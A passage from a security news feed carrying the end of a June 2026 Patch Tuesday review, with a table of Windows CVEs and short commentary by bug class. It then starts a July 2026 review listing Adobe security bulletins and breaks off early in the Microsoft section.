  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42914"><span>CVE-2026-42914</span></a></td>
  <td width="256" class="xl68">Windows Kerberos
  Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48583"><span>CVE-2026-48583</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45653"><span>CVE-2026-45653</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42984"><span>CVE-2026-42984</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45600"><span>CVE-2026-45600</span></a></td>
  <td width="256" class="xl68">Windows Kernel-Mode
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45604"><span>CVE-2026-45604</span></a></td>
  <td width="256" class="xl68">Windows Managed
  Installer Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45595"><span>CVE-2026-45595</span></a></td>
  <td width="256" class="xl68">Windows Mark of the
  Web Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45636"><span>CVE-2026-45636</span></a></td>
  <td width="256" class="xl68">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50508"><span>CVE-2026-50508</span></a></td>
  <td width="256" class="xl68">Windows NTLM Spoofing
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48565"><span>CVE-2026-48565</span></a></td>
  <td width="256" class="xl68">Windows Narrator
  Braille Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44805"><span>CVE-2026-44805</span></a></td>
  <td width="256" class="xl68">Windows Network
  Controller (NC) Host Agent Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42981"><span>CVE-2026-42981</span></a></td>
  <td width="256" class="xl68">Windows Performance
  Monitor Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42974"><span>CVE-2026-42974</span></a></td>
  <td width="256" class="xl68">Windows Performance
  Monitor Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45487"><span>CVE-2026-45487</span></a></td>
  <td width="256" class="xl68">Windows Program
  Compatibility Assistant Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42828"><span>CVE-2026-42828</span></a></td>
  <td width="256" class="xl68">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42837"><span>CVE-2026-42837</span></a></td>
  <td width="256" class="xl68">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42969"><span>CVE-2026-42969</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42971"><span>CVE-2026-42971</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42970"><span>CVE-2026-42970</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42973"><span>CVE-2026-42973</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42978"><span>CVE-2026-42978</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42977"><span>CVE-2026-42977</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42979"><span>CVE-2026-42979</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42991"><span>CVE-2026-42991</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45639"><span>CVE-2026-45639</span></a></td>
  <td width="256" class="xl68">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42908"><span>CVE-2026-42908</span></a></td>
  <td width="256" class="xl68">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45593"><span>CVE-2026-45593</span></a></td>
  <td width="256" class="xl68">Windows SDK Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42906"><span>CVE-2026-42906</span></a></td>
  <td width="256" class="xl68">Windows Shell
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42907"><span>CVE-2026-42907</span></a></td>
  <td width="256" class="xl68">Windows Shell
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47648"><span>CVE-2026-47648</span></a></td>
  <td width="256" class="xl68">Windows Storage
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42915"><span>CVE-2026-42915</span></a></td>
  <td width="256" class="xl68">Windows TCP/IP Denial
  of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42904"><span>CVE-2026-42904</span></a></td>
  <td width="256" class="xl68">Windows TCP/IP
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42968"><span>CVE-2026-42968</span></a></td>
  <td width="256" class="xl68">Windows Telephony
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42912"><span>CVE-2026-42912</span></a></td>
  <td width="256" class="xl68">Windows Telephony
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45597"><span>CVE-2026-45597</span></a></td>
  <td width="256" class="xl68">Windows UI Automation
  Manager (uiamanager.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45599"><span>CVE-2026-45599</span></a></td>
  <td width="256" class="xl68">Windows UPnP Device
  Host Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45635"><span>CVE-2026-45635</span></a></td>
  <td width="256" class="xl68">Windows UPnP Device
  Host Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40409"><span>CVE-2026-40409</span></a></td>
  <td width="256" class="xl68">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40404"><span>CVE-2026-40404</span></a></td>
  <td width="256" class="xl68">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42989"><span>CVE-2026-42989</span></a></td>
  <td width="256" class="xl68">Winlogon
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 &lt;![if supportMisalignedColumns]&gt;
 <tr height="0">
  <td width="144"></td>
  <td width="256"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
 </tr>
 &lt;![endif]&gt;
</table>











  
  









  <p class=""><em>* Indicates this CVE had been released by a third party and is now being included in Microsoft releases</em>.</p><p class=""><em>† Indicates further administrative actions are required to fully address the vulnerability.</em></p><p class=""><em> </em></p><p class="">Looking at the other Critical-rated bugs in this release, the scariest-looking one is actually nothing to concern yourself with at all. The CVSS 10 bug in Azure HorizonDB has already been addressed by Microsoft and is just being documented now. That’s also the case for five others. Of course, there wouldn’t be a release without Office bugs that have the Preview Pane as an attack vector. There are multiple in June. There’s a handful of bugs in the Remote Desktop Client, but these rely on connecting to a malicious RDP server. There are three patches for Hyper-V that allow for guest-to-host code execution. The bug in Active Directory requires authentication, but any authenticated user can hit it. For the Windows Directory Service vulnerability, it needs to be listening for TFTP. You have blocked that everywhere, right? The bug in Azure Network Adapter is somewhat unique as you need to update your Linux kernel to be protected. The bug in Azure Kubernetes allows an attacker to break out of a container and gain control of the AKS worker node. Finally, the bug in the Kerberos Key Distribution Center (KDC) seems unlikely, but if exploited, it could allow authenticated attackers to get code execution on affected systems.</p><p class="">Moving on to the other code execution bugs, there are the ubiquitous open-an-own bugs in Office components like Excel and Word. The code injection bug in Exchange Server looks troubling, but it requires a machine-in-the-middle (MiTM), so exploitation is unlikely. The bugs in SharePoint require authentication, but you should note that the patch applies to both SharePoint Server 2016 and SharePoint Enterprise Server 2016. The two bugs in UPnP are interesting. Both can lead to code execution by causing an error during the handling of specially crafted data, which could lead to a Use After Free (UAF) bug. The bugs in RDP Client all require connecting to a malicious RDP server, but it’s not clear why some are rated Critical and some are rated Important. The NTFS vulnerability requires a user to mount a virtual hard drive on an affected system. The last RCE bug this month is in Azure Stack Edge and requires the attacker to send a specially crafted file upload request that includes a manipulated file name or path, leading to code execution.</p><p class="">There are more than 60 Elevation of Privilege (EoP) bugs in this month’s release, and as usual, most simply lead to local attackers executing their code at SYSTEM-level privileges or administrative privileges, so there’s not much to add without further technical details about the bugs themselves. A notable exception is in Exchange Server, where a user on Outlook Web Access (OWA) could gain access to other mailboxes. The bug in Visual Studio Code could allow attackers to gain permissions associated with the MCP Server’s managed identity. The bugs in Windows SDK and Windows UI Automation Manager could let attacker go from low integrity up to medium integrity code execution. The bug in Bluetooth just allows “elevated” privileges without really describing what elevated might be. </p><p class="">Moving on to the more than 20 security feature bypass (SFB) bugs in the June release, there are a total of 10 that impact Secure Boot. All carry scope change (S:C) in the CVSS, meaning successful exploitation affects security boundaries beyond the vulnerable component itself — specifically the ability to load untrusted code at boot, bypass Virtual Secure Mode, and undermine boot integrity guarantees. CVE-2026-45654 explicitly calls out VSM exposure. The bulk of these are credited to Alon Leviev (STORM), which is notable given his prior BootKitty/BlackLotus-adjacent research. The bugs in the Windows Boot Manager have a similar impact as the Secure Boot bugs. The UEFI Secure Boot vulnerabilities go a layer deeper. They require either local admin or physical access but could allow for the running of untrusted code even before the OS loads. Rootkits anyone? The four bugs in BitLocker all require physical access but could yield encrypted data if exploited. The bug in Windows Administration Protection allows attackers to bypass the feature that prevents standard-user apps from performing admin-level actions. The bug in Visual Studio Copilot Chat could be the most interesting non-boot bug here as it allows authentication impersonation. Mark of the Web (MotW) and Excel vulns could bypass user warnings. Lastly, the bug in PC Manager bypasses expected user controls. </p><p class="">Turning our attention to the mass of spoofing bugs in the release, we instantly see 18 impacting SharePoint Server. Fortunately, these are simply cross-site scripting (XSS) bugs. It’s the Exchange bugs we should really watch for. One is an XSS that an attacker can exploit by convincing an Exchange administrator to open a malicious link or message, which then runs code in the admin's web session. That's a meaningful privilege escalation path. Another is listed as an SSRF-based attack, but no other details are available. The last is a lower-impact XSS with limited confidentiality/integrity loss. The bug in Bing Search (remember Bing?) is a classic search result spoofing. The bug in Azure Stack Edge is interesting as it could allow access to resources outside the vulnerable component's security boundary. The bug in Office for Android requires user interaction. The Office Project Server bug is an authenticated XSS with low impact. The final spoofing bug is in Azure Attestation but has already been addressed. You should still verify you are protected by following the instructions in the write-up from Microsoft.</p><p class="">There are 30 different information disclosure bugs in this release, and fortunately, the vast majority of these simply result in info leaks consisting of unspecified memory contents or memory addresses. The two bugs in Visual Studio require user interaction and could “disclose information over a network.” How obtuse. The bug in GitHub Copilot and Visual Studio Code could disclose discloses a sign-in access token for a user's work account. That's a meaningful credential exposure, not just random memory. That leaves the two bugs in Exchange Server. One could allow an authenticated user to gain information about which network services that the Exchange server can reach. The other sounds much like the spoofing bug in OWA as it allows attackers to see information in mailboxes they should not have access to.</p><p class="">I’ve never been a fan of the “tampering” category, as it could mean so many different things. For example, the bug in .NET simply says it could allow an unauthorized attacker to perform tampering locally. Similarly, the bug in Visual Studio says the same, expect here the tampering occurs over a network. Microsoft doesn’t even bother with a CWE for the tampering bug in the DHCP Server, so your guess is as good as mine.</p><p class="">There are seven DoS bugs in the June release, and as usual, Microsoft provides little to no actionable information about the vulnerabilities. The most interesting is the bug in HTTP.sys, which is listed as publicly known. This is an uncontrolled resource consumption, rated "Exploitation More Likely," and publicly disclosed. Since, HTTP.sys sits at the core of IIS and Windows web services, a network-accessible DoS here can take down any Windows server running HTTP-based services. Based on the Acknowledgement, it looks like this bug may have been found using AI. There are no real details for the other bugs, but based simply on the impact, I would focus on the Kerberos and TCP/IP bugs if you had to prioritize.</p><p class="">No new advisories are being released this month.</p><p class=""><strong>Looking Ahead</strong></p><p class="">The next Patch Tuesday will be on July 14 and will be the last one before Black Hat/DEFCON. It’s usually a big release, so strap in and hang on. I’ll be back then to give you my full thoughts. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!</p><p class=""> </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The July 2026 Security Update Review]]></title>
<description><![CDATA[Well folks. Here we are. The bug apocalypse has fully descended upon us. I’ll do my best to sort this out in some way meaningful, but this month’s release shows us the nay-sayers were right, and I’ve got to hand it to the nay-sayers here. Excellent call. Take an extended break from your regularly...]]></description>
<link>https://tsecurity.de/de/3694560/hacking/the-july-2026-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694560/hacking/the-july-2026-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:51 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">Well folks. Here we are. The bug apocalypse has fully descended upon us. I’ll do my best to sort this out in some way meaningful, but this month’s release shows us the nay-sayers were right, and I’ve got to hand it to the nay-sayers here. Excellent call. Take an extended break from your regularly scheduled activities as we let’s take a look at the latest security patches from Adobe and Microsoft. If you’d rather watch the full video recap covering the entire release, you can check it out here:</p>





















  
  




  
















  
    
      
    
    
      
        
      
    
    
    



  






  <p class=""><strong>Adobe Patches for July 2026</strong></p><p class="">Adobe has now moved to a bimonthly release schedule, which means they will be releasing patches on the second and fourth Tuesdays of the month. I’ll continue to cover the second Tuesday release here and update this blog should the fourth Tuesday release contain anything significant. I think this is a smart way to break up a monster release into something a bit more manageable. Apple has said they are taking a similar approach. We’ll see if other vendors follow their lead.</p><p class="">For the first part of the July release, Adobe released 12 bulletins addressing 88 unique CVEs in Adobe ColdFusion, Commerce, After Effects, Animate, Audition, Bridge, Creative Cloud Desktop Application, Experience Manager, Illustrator, Media Encoder, Premiere Pro, and the Content Credentials SDK.</p><p class="">Here’s this month’s overview table:</p>





















  
  




  


  
    


<table>
<colgroup>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
</colgroup>
<thead>
  <tr>
    <th>Bulletin ID</th>
    <th>Product</th>
    <th>CVE Count</th>
    <th>Highest Severity</th>
    <th>Highest CVSS</th>
    <th>Exploited</th>
    <th>Deployment Priority</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/coldfusion/apsb26-82.html" target="_blank">APSB26-82</a></td>
    <td>Adobe ColdFusion</td>
    <td>13</td>
    <td>Critical</td>
    <td>9.9</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/magento/apsb26-73.html" target="_blank">APSB26-73</a></td>
    <td>Adobe Commerce</td>
    <td>13</td>
    <td>Critical</td>
    <td>9.6</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/after_effects/apsb26-78.html" target="_blank">APSB26-78</a></td>
    <td>Adobe After Effects</td>
    <td>3</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/animate/apsb26-83.html" target="_blank">APSB26-83</a></td>
    <td>Adobe Animate</td>
    <td>6</td>
    <td>Critical</td>
    <td>8.6</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/audition/apsb26-71.html" target="_blank">APSB26-71</a></td>
    <td>Adobe Audition</td>
    <td>6</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/bridge/apsb26-81.html" target="_blank">APSB26-81</a></td>
    <td>Adobe Bridge</td>
    <td>6</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/creative-cloud/apsb26-77.html" target="_blank">APSB26-77</a></td>
    <td>Adobe Creative Cloud Desktop Application</td>
    <td>2</td>
    <td>Critical</td>
    <td>8.1</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html" target="_blank">APSB26-74</a></td>
    <td>Adobe Experience Manager</td>
    <td>13</td>
    <td>Critical</td>
    <td>9.6</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/illustrator/apsb26-79.html" target="_blank">APSB26-79</a></td>
    <td>Adobe Illustrator</td>
    <td>5</td>
    <td>Critical</td>
    <td>9.3</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/media-encoder/apsb26-72.html" target="_blank">APSB26-72</a></td>
    <td>Adobe Media Encoder</td>
    <td>5</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/premiere_pro/apsb26-76.html" target="_blank">APSB26-76</a></td>
    <td>Adobe Premiere Pro</td>
    <td>4</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/content-authenticity-sdk/apsb26-80.html" target="_blank">APSB26-80</a></td>
    <td>Content Credentials SDK</td>
    <td>12</td>
    <td>Critical</td>
    <td>8.2</td>
    <td>No</td>
    <td>3</td>
  </tr>
</tbody>
<tfoot>
  <tr>
    <td>TOTAL</td>
    <td>12 bulletins</td>
    <td>88</td>
    <td></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
</tfoot>
</table>



  
  









  <p class="">While nothing is under active exploit, I would prioritize the Cold Fusion and Commerce patches first. The patch for Cold Fusion even clocks in with a CVSS 9.9 bug. Beyond that, most of these updates are pretty straightforward. If you’re using these products, patch them. However, you can use you regular patch cadence here. </p><p class=""><strong>Microsoft Patches for July 2026</strong></p><p class="">Here it is. The Mother of All Releases. To call this record-breaking is an understatement. How to count this mess is anyone’s guess, but I see new Microsoft 621 CVEs for the month of July. Some of these are in online services where no user action is required. They also list about 480 bugs in Chromium and Microsoft Edge (Chromium-based) that I won’t cover here. Here’s how I put this in context. I looked at the last 20 years of Microsoft releases. The CVE count year-to-date exceeds all other years’ totals.</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
